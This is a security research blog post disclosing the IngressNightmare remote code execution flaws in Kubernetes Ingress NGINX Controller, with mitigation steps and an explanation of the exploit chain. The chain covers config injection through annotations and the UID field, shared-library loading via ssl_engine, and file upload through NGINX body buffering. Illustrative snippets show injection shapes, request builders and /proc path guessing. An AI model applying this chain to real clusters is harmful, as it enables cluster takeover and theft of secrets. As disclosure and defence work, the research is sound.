Remote Code Execution Vulnerabilities in Ingress NGINX

Wiz Research discovered CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 and CVE-2025-1974, a series of unauthenticated Remote Code Execution vulnerabilities in Ingress NGINX Controller for Kubernetes dubbed #IngressNightmare. Exploitation of these vulnerabilities leads to unauthorized access to all secrets stored across all namespaces in the Kubernetes cluster by attackers, which can result in cluster takeover. 
 
This attack vector has been assigned a CVSS v3.1 base score of 9.8. 

In this blog post, we share key learnings from our discovery of IngressNightmare, which affects the admission controller component of Ingress NGINX Controller for Kubernetes. Based on our analysis, about 43% of cloud environments are affected, and our research uncovered over 6,500 clusters, including those of Fortune 500 companies, that expose vulnerable Kubernetes ingress controllers' admission controllers directly to the public internet, putting them at immediate critical risk. 

We recommend patching as soon as possible. This blog post details the technical elements of the vulnerability and contains mitigation and detection guidance for defenders.

We would like to thank the Ingress-NGINX maintainers, particularly Marco Ebert, for their help in addressing the IngressNightmare vulnerabilities. Our team worked closely with the Kubernetes maintainers and security teams to ensure this attack surface was fully eliminated before public disclosure. The Kubernetes blog post can be found here.

Ingress NGINX Controller is one of the most popular ingress controllers available for Kubernetes, and a core Kubernetes project, with over 18,000 stars on GitHub. Using Ingress-NGINX is one of the most common methods for exposing Kubernetes applications externally. As an ingress controller, its job is to accept incoming traffic and route it to the relevant Kubernetes Services, which in turn forward the traffic to the appropriate Pods based on a set of rules. Specifically, Ingress NGINX Controller is built on the popular NGINX reverse proxy. 

 Figure: Ingress prerequisites from the Kubernetes documentation. 

Ingress-NGINX is explicitly highlighted in the Kubernetes documentation as an example Ingress controller that fulfills the prerequisite for using Ingress in Kubernetes. Our research shows that over 41% of internet-facing clusters are running Ingress-NGINX. 

Ingress NGINX deploys an admission controller within its pod, designed to validate incoming ingress objects before they are deployed. By default, admission controllers are accessible over the network without authentication, making them a highly appealing attack vector. 

When the Ingress-NGINX admission controller processes an incoming ingress object, it constructs an NGINX configuration from it and then validates it using the NGINX binary.  Our team found a vulnerability in this phase that allows injecting an arbitrary NGINX configuration remotely, by sending a malicious ingress object directly to the admission controller through the network.  

During the configuration validation phase, the injected NGINX configuration causes the NGINX validator to execute code, allowing remote code execution (RCE) on the Ingress NGINX Controller’s pod. 

The admission controller’s elevated privileges and unrestricted network accessibility create a critical escalation path. Exploiting this flaw allows an attacker to execute arbitrary code and access all cluster secrets across namespaces, which can lead to complete cluster takeover. 

Figure: IngressNightmare attack vectors 

Mitigation & Detection 

First, determine if your clusters are using ingress-nginx. In most cases, you can check this by running kubectl get pods --all-namespaces --selector app.kubernetes.io/name=ingress-nginx with cluster administrator permissions.

This vulnerability is fixed in Ingress NGINX Controller versions 1.12.1 and 1.11.5. We strongly recommend that cluster admins: 

  • Update to the latest version of Ingress NGINX Controller. 

  • Ensure the admission webhook endpoint is not exposed externally. 

    • You can use this Nuclei template to check for exposed Ingress-NGINX admission controllers. 

If you can’t upgrade immediately, consider one of these mitigations: 

  • Enforce strict network policies so only the Kubernetes API Server can access the admission controller. 

  • Temporarily disable the admission controller component of Ingress-NGINX.

    • If you have installed ingress-nginx using Helm, reinstall it with controller.admissionWebhooks.enabled=false. 

    • If you have installed ingress-nginx manually, delete the ValidatingWebhookConfiguration called ingress-nginx-admission and remove the --validating-webhook argument from the ingress-nginx-controller container’s Deployment or DaemonSet. 

    • Remember to re-enable the Validating Admission Controller after you upgrade, because it provides important safeguards for your Ingress configurations. 
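The network-policy mitigation above can be sketched as follows. This is a minimal illustration, not a drop-in policy: the namespace, pod labels, API-server address, and webhook port below are assumptions you must adjust for your own cluster.

```yaml
# Hypothetical NetworkPolicy: allow only the Kubernetes API server to reach
# the admission webhook. Namespace, labels, CIDR, and port are placeholders.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: restrict-ingress-nginx-admission
  namespace: ingress-nginx
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: ingress-nginx
  policyTypes:
    - Ingress
  ingress:
    - from:
        - ipBlock:
            cidr: 203.0.113.10/32   # assumed API-server address
      ports:
        - protocol: TCP
          port: 8443                # assumed admission webhook container port
```

Note that this blocks the attack path described in this post (pods reaching the webhook directly) while keeping the webhook functional for the API server.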

Wiz customers can use the pre-built query and advisory in the Wiz Threat Center. Wiz also validates for exposed admission controllers using the Wiz Dynamic Scanner. Finally, the Wiz Runtime Sensor detects zero-day vulnerabilities like IngressNightmare, by continuously monitoring ingress traffic, capturing malicious admission review requests in real-time, and flagging anomalous library loads to prevent similar attacks.

Research Motivation 

Kubernetes Admission Controllers present an interesting and often overlooked attack surface in a Kubernetes environment. They are triggered by the Kubernetes API server to review and potentially modify or block requests (AdmissionReview) before they are processed, and they often run with relatively high privileges within the cluster. Admission Controllers frequently don't require authentication and essentially function as web servers, introducing an additional internal network-accessible endpoint in the cluster. This architecture allows attackers to access them directly from any pod in the network, significantly increasing the attack surface. 

Background on Ingress NGINX Controller for Kubernetes 

Ingress NGINX Controller is an ingress implementation that uses NGINX as a reverse proxy and a load balancer. It is one of the most popular ingresses and is a core Kubernetes project. 

To bridge between Kubernetes and NGINX, a non-Kubernetes-native technology, the controller translates Kubernetes Ingress objects into NGINX configurations. To ensure the stability of the NGINX server, the controller employs a validating admission webhook that validates the final configuration before applying it.

Figure: Simplified diagram of Ingress NGINX Controller

From an attacker's perspective, the admission controller is an unauthenticated HTTP endpoint responsible for complicated operations, and by default it runs with a Kubernetes role that allows access to all of the environment’s secrets, making it an appealing research target. 

Remote NGINX Configuration Injection 

During our review of the Ingress NGINX Admission Controller code, we identified an interesting code path: when it processes incoming AdmissionReview requests, it generates a temporary NGINX configuration file based on a template file and the provided Ingress object. It then tests the validity of the temporary configuration file using the nginx -t command. We found multiple ways to inject new configuration directives in this code path. 

Typically, only the Kubernetes API server should send these AdmissionReview requests. However, because the Admission Controller lacks authentication, an attacker with minimal network access could craft and send arbitrary AdmissionReview requests from any pod within the cluster. 

For our testing, we used kube-review to create admission review requests from Ingress resource manifests, which could then be sent directly to the admission controller via HTTP.
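As a minimal sketch of what such a request looks like, the snippet below wraps an Ingress manifest in an AdmissionReview envelope, similar in shape to kube-review's output. The field names follow the admission.k8s.io/v1 API; the Ingress contents, annotation value, and endpoint are hypothetical.

```python
import json
import uuid

def build_admission_review(ingress: dict) -> dict:
    """Wrap an Ingress manifest in an AdmissionReview envelope (shape per the
    admission.k8s.io/v1 API), similar to what kube-review produces."""
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {
            "uid": str(uuid.uuid4()),
            "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "resource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
            "operation": "CREATE",
            "object": ingress,
        },
    }

# Hypothetical Ingress carrying an ingress-nginx annotation.
ingress = {
    "apiVersion": "networking.k8s.io/v1",
    "kind": "Ingress",
    "metadata": {
        "name": "demo",
        "annotations": {"nginx.ingress.kubernetes.io/auth-url": "http://example.com/"},
    },
    "spec": {"ingressClassName": "nginx"},
}

body = json.dumps(build_admission_review(ingress))
# `body` can then be POSTed over HTTPS to the admission webhook endpoint.
```

Because the webhook is unauthenticated, nothing distinguishes this hand-built request from one sent by the API server.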

Figure: Example of an Admission Review object 

As can be seen above, there are plenty of fields we can control, showing the large attack surface. In this blog post we will look at two vulnerabilities in the annotation parsers that parse the .request.object.annotations field in the request above. Properties from this field are later included in the NGINX configuration file – which we used to inject arbitrary directives. 

CVE-2025-24514 – auth-url Annotation Injection 

The authreq parser is responsible for handling authentication-related annotations. It requires the auth-url field to be set to a URL, which is ultimately propagated into the configuration file through this code flow: 

When the temporary configuration is created, $externalAuth.URL—which corresponds to the URL from the auth-url annotation—is incorporated without proper sanitization.  

This lack of proper sanitization allows an attacker to inject arbitrary NGINX configuration directives, which get evaluated when nginx -t runs. 
 
Consider the following auth-url annotation: 

The final configuration will appear as follows:
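To illustrate the shape of the technique (the annotation value, variable name, and injected directive below are hypothetical, not the exact payload or the controller's actual template):

```nginx
# Hypothetical illustration of the injection shape. An annotation value like
#   nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\ninjected_directive arg;"
# is substituted verbatim into the temporary configuration, so the ';' and
# newline terminate the original directive and an attacker-chosen directive
# appears on its own line:
set $target http://example.com/#;
injected_directive arg;
```

When nginx -t parses this file, the injected directive is evaluated like any other.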

This vulnerability does not apply to v1.12.0. In this version, Ingress NGINX Controller changed its default security settings to verify all annotations, including auth-url, against strict regex rules.   

CVE-2025-1097 – auth-tls-match-cn Annotation Injection 

The authtls parser, for its auth-tls-match-cn annotation, uses CommonNameAnnotationValidator to validate the field value: 

In other words, the auth-tls-match-cn annotation requires: 

  1. The value must start with CN=. 

  2. All remaining characters must form a valid regular expression. 
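A minimal Python sketch of those two checks, as our reconstruction of the described validation rules rather than the controller's actual Go code (note that Go uses RE2 syntax, which differs slightly from Python's re module):

```python
import re

def validate_match_cn(value: str) -> bool:
    """Reconstruction of the two documented checks for auth-tls-match-cn:
    the value must start with 'CN=' and the remainder must compile as a
    regular expression. Mirrors the described behavior only; the real
    validator is Go code using RE2 regex syntax."""
    if not value.startswith("CN="):
        return False
    try:
        re.compile(value[len("CN="):])
    except re.error:
        return False
    return True
```

Any payload must therefore survive regex compilation, which is what makes this injection trickier than the auth-url case.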

Similar to the previous injection, $server.CertificateAuth.MatchCN corresponds to the value of the auth-tls-match-cn annotation. While tricky, we can still bypass both requirements to inject arbitrary NGINX configurations in this part of the template:

Consider the following auth-tls-match-cn annotation:

The final configuration will appear as follows:

For the auth-tls-match-cn annotation value to appear in the configuration, we also need to provide the nginx.ingress.kubernetes.io/auth-tls-secret annotation, which corresponds to a TLS certificate or keypair secret present in the cluster. Since the service account used by Ingress NGINX has access to all secrets in the cluster, we can specify any secret name from any namespace, provided it matches the required TLS certificate/keypair format. Notably, many managed Kubernetes solutions include such secrets by default. Below is a short list of common secrets that can be leveraged in this type of attack: 

CVE-2025-1098 – mirror UID Injection 

In the mirror annotation parser, the following code processes the UID from the ingress object, and inserts it into $location.Mirror.Source in the temporary NGINX configuration. We control the ing.UID field, which allows for a new injection point.  

Because this injection is in the UID parameter, which is not a Kubernetes annotation, our input is not sanitized by the annotations’ regex rules. It is inserted as-is, so we can easily escape our context and inject arbitrary NGINX configuration directives. 
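The shape of such a request is sketched below. The UID payload and directive are hypothetical; the mirror annotation is included because the UID only reaches the configuration through the mirror annotation parser.

```yaml
# Hypothetical AdmissionReview fragment. metadata.uid is attacker-supplied
# and, being outside the annotation validation path, is inserted into the
# NGINX configuration as-is.
request:
  object:
    apiVersion: networking.k8s.io/v1
    kind: Ingress
    metadata:
      name: demo
      uid: |
        dummy;
        injected_directive arg
      annotations:
        nginx.ingress.kubernetes.io/mirror-target: http://example.com/
```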

The vulnerabilities above allow an attacker to inject arbitrary directives into the NGINX configuration, which is later tested by nginx -t. This does not immediately lead to code execution. However, if we can find a directive that executes arbitrary code during nginx -t, we can compromise the pod and obtain its highly privileged Kubernetes role. It is important to note that the NGINX configuration is only tested, not applied, which reduces the number of directives we can actually (ab)use. 

Figure: Partial list of available NGINX directives (source) 

Initially we tried to use the load_module directive, which can load a shared library from the filesystem. However, it can only be used at the beginning of the NGINX configuration, so when injected later in the file, load_module fails with the following error message: 

Figure: `load_module` fails as it is specified too late in the configuration

There are many usable directives in Ingress NGINX Controller, as its NGINX instance is compiled with many additional modules. We found that the ssl_engine directive, part of the OpenSSL module, can also load shared libraries. This behavior is undocumented. Unlike load_module, ssl_engine can be used at any point within the configuration file, making it suitable for our injection’s constraints. 
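Conceptually, the injected directive ends up looking like this (the PID and FD numbers are illustrative placeholders):

```nginx
# Illustrative only: unlike load_module, ssl_engine is accepted anywhere in
# the configuration, and (undocumented behavior) loads the given path as a
# shared library when 'nginx -t' parses it. The path below points at a
# deleted client body buffer file still reachable through ProcFS.
ssl_engine /proc/148/fd/11;
```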

We can now load arbitrary library files during the NGINX configuration testing phase. Our next challenge is: How can we place a shared library on the pod’s filesystem? 

Uploading a shared library with NGINX Client Body Buffers 

In parallel to the nginx -t and the admission controller webhook, the pod also runs the NGINX instance itself, listening on port 80 or 443:  

Figure: NGINX is running in the same pod as Ingress NGINX Controller

When processing requests, NGINX sometimes saves the request body to a temporary file (client body buffering). This happens when the HTTP request body exceeds a certain threshold, 8KB by default. This means we should theoretically be able to send a large (>8KB) HTTP request containing our payload, in the form of a shared library, as the body of the request, and NGINX will temporarily save it to a file on the pod’s filesystem. 

Unfortunately, NGINX also removes the file immediately, creating a nearly impossible race condition. However, NGINX holds an open file descriptor pointing to the file, which remains accessible through ProcFS.

Figure: File descriptor is still accessible from ProcFS, although the file itself is already deleted (FD #11)

To keep the file descriptor open, we can set the Content-Length header in the request to be larger than the actual content size. NGINX will keep waiting for more data, causing the process to hang and leaving the file descriptor open for longer. 
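A sketch of such a request in Python. The target host is an assumption, and the body is a stand-in for a compiled shared object; this only builds the raw bytes, which would then be sent over a socket that is deliberately kept open.

```python
def build_upload_request(host: str, body: bytes, extra: int = 1) -> bytes:
    """Build a raw HTTP request whose Content-Length overstates the body by
    `extra` bytes. NGINX buffers the >8KB body to a temp file, then keeps the
    connection (and the deleted file's descriptor) open while waiting for the
    missing bytes."""
    assert len(body) > 8 * 1024, "body must exceed the 8KB buffering threshold"
    headers = (
        f"POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {len(body) + extra}\r\n"
        f"Connection: keep-alive\r\n"
        f"\r\n"
    ).encode()
    return headers + body

payload = b"\x7fELF" + b"A" * (9 * 1024)   # stand-in for a shared library
request = build_upload_request("ingress.example.internal", payload)
# Send `request` over a raw socket and keep the socket open so NGINX
# never finishes reading the body and never closes the descriptor.
```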

The only downside to this trick is that the file is created by a different process, so we can’t use /proc/self to access it. Instead, we have to guess both the PID and the FD number to find the shared library; since this is a container with minimal processes, a few guesses are usually enough. 
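The guessing step amounts to enumerating a small search space of candidate ProcFS paths. The PID and FD ranges below are assumptions for a minimal container, not values from the actual exploit.

```python
from itertools import product

def candidate_paths(max_pid: int = 50, max_fd: int = 32) -> list[str]:
    """Enumerate candidate /proc/<pid>/fd/<fd> paths to try as the ssl_engine
    target. In a minimal container, both the NGINX worker PIDs and the buffer
    file's descriptor number are small, so the search space is tiny; each
    guess costs one AdmissionReview request. FDs 0-2 (stdio) are skipped."""
    return [f"/proc/{pid}/fd/{fd}"
            for pid, fd in product(range(1, max_pid + 1), range(3, max_fd + 1))]
```

Each candidate path is then injected via the ssl_engine directive until one guess loads the uploaded library.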

With a reliable file upload to Ingress NGINX Controller’s pod, we can now put everything together and turn this issue into full-blown remote code execution. 

The exploit works as follows: 

  1. Upload our payload in the form of a shared library to the pod by abusing the client-body buffer feature of NGINX 

  2. Send an AdmissionReview request to the Ingress NGINX Controller’s admission controller, which contains any one of our directive injections 

  3. The directive we inject is the ssl_engine directive, which will cause NGINX to load the specified file as a shared library 

  4. We specify the ProcFS path to the file descriptor of our payload 

  5. If everything goes well, our shared library is now loaded, and we execute code remotely 

Here is a demo of the exploit in practice:

We are only scratching the surface of admission controller security. Initially, we were surprised to see how large a code base runs behind the scenes. In our view, this attack surface should be restricted far more tightly: access from pods within the cluster should be removed, and it should never be exposed publicly. We were also surprised by the lack of least-privilege design, as the exploit ended up with privileges sufficient to take control of the cluster. During this research, we found other vulnerabilities in Ingress NGINX Controller, and we expect to find more in other admission controllers. 

Finally, we learned that nginx -t should be considered harmful. We would be happy to hear about other cases where nginx -t processes unsanitized user input in the wild. This should be more clearly highlighted in the NGINX documentation. 

December 31, 2024 – Wiz Research reported CVE-2025-1974 and CVE-2025-24514 to Kubernetes. 

January 2, 2025 – Wiz Research reported CVE-2025-1097 to Kubernetes. 

January 3, 2025 – Kubernetes acknowledged the reports. 

January 9, 2025 – Kubernetes proposed a fix for CVE-2025-1097. 

January 10, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1097. 

January 12, 2025 – Kubernetes proposed a fix for CVE-2025-1974. 

January 16, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-1974. 

January 20, 2025 – Kubernetes proposed a fix for CVE-2025-24513. 

January 21, 2025 – Wiz Research reported a bypass for the proposed fix for CVE-2025-24513. 

January 21, 2025 – Wiz Research reported CVE-2025-1098 to Kubernetes. 

February 7, 2025 – Kubernetes released internal patches for the injection vulnerabilities: CVE-2025-1098, CVE-2025-1097, and CVE-2025-24514. 

February 20, 2025 – Kubernetes notified Wiz Research that they removed the NGINX configuration validation from the admission controller, resolving CVE-2025-1974. 

March 10, 2025 – Kubernetes sent embargo notifications regarding the five vulnerabilities reported by Wiz Research. 

March 24, 2025 – Public disclosure.  

Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), and Andres Riancho (@andresriancho) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: [email protected]

